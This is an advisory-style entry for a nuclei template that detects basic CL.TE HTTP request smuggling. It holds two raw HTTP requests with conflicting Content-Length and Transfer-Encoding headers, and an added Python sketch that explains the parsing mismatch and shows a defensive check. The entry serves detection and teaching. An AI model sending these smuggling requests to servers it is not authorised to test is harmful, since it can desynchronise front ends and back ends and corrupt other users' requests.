cl-te-http-smuggling: Basic CL.TE - HTTP request smuggling

Date: 2025-11-11 | Affected software: cl-te-http-smuggling | PoC: public

Vulnerability description

Detected a potential CL.TE request smuggling condition where conflicting Content-Length and Transfer-Encoding headers caused the gateway and backend to parse requests differently.

PoC code [public]

id: cl-te-http-smuggling

info:
  name: Basic CL.TE - HTTP request smuggling
  author: pdteam,akincibor
  severity: low
  description: |
    Detected a potential CL.TE request smuggling condition where conflicting Content-Length and Transfer-Encoding headers caused the gateway and backend to parse requests differently.
  reference:
    - https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te
  metadata:
    verified: true
    max-request: 2
  tags: cl-te,smuggling

http:
  - raw:
      - |+
        POST / HTTP/1.1
        Host: {{Hostname}}
        Connection: keep-alive
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 6
        Transfer-Encoding: chunked

        0

        G

      - |+
        POST / HTTP/1.1
        Host: {{Hostname}}
        Connection: keep-alive
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 6
        Transfer-Encoding: chunked

        0

        G

    unsafe: true

    matchers:
      - type: dsl
        dsl:
          - 'contains(body_2, "Unrecognized method GPOST")'
# digest: 490a00463044022073f8bfc3708303eb69994eea872499475e24861107f1661fd4d59fa2e4e377b0022002551f2e8288a11d56bf0794bdfb05337053497351bba53e748269202e050c25:922c64590222798bb761d5b6d8e72950
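
Added example, not part of the template or of the nuclei project: a small Python sketch of why the matcher looks for "GPOST". It frames the template's request once by Content-Length (the front-end view) and once by chunked encoding (the back-end view) and shows the byte the back end leaves on the connection. The host example.test and all function names are assumptions made for illustration.

```python
CRLF = b"\r\n"

# Constructed input: the template's request, {{Hostname}} replaced by a placeholder.
RAW = (b"POST / HTTP/1.1\r\nHost: example.test\r\n"
       b"Content-Length: 6\r\nTransfer-Encoding: chunked\r\n\r\n"
       b"0\r\n\r\nG")

def split_head(raw):
    """Return (lower-cased header dict, bytes after the header block)."""
    head, _, rest = raw.partition(CRLF + CRLF)
    headers = {}
    for line in head.split(CRLF)[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip().lower()
    return headers, rest

def frame_by_content_length(raw):
    """Front-end ('CL') view: the body is exactly Content-Length bytes."""
    headers, rest = split_head(raw)
    n = int(headers[b"content-length"])
    return rest[:n], rest[n:]

def frame_by_chunked(raw):
    """Back-end ('TE') view: the body ends at the zero-size chunk."""
    _, rest = split_head(raw)
    body = b""
    while True:
        size_line, _, rest = rest.partition(CRLF)
        size = int(size_line.split(b";")[0], 16)
        if size == 0:
            break
        body += rest[:size]
        rest = rest[size + 2:]          # skip chunk data and its CRLF
    while True:                         # consume trailers up to the blank line
        line, _, rest = rest.partition(CRLF)
        if not line:
            return body, rest

def is_ambiguous(raw):
    """Defensive check: a request carrying both headers can be framed two ways."""
    headers, _ = split_head(raw)
    return b"content-length" in headers and b"transfer-encoding" in headers

def demo():
    _, fe_left = frame_by_content_length(RAW)   # front end: nothing left over
    _, be_left = frame_by_chunked(RAW)          # back end: b"G" stays buffered
    next_request = b"POST / HTTP/1.1"           # next request on the reused connection
    return fe_left, be_left, (be_left + next_request).split(b" ")[0]

if __name__ == "__main__":
    print(is_ambiguous(RAW), demo())
```

A front end that applies is_ambiguous-style logic and rejects the request (or forwards it with only one framing header) removes the disagreement the template detects.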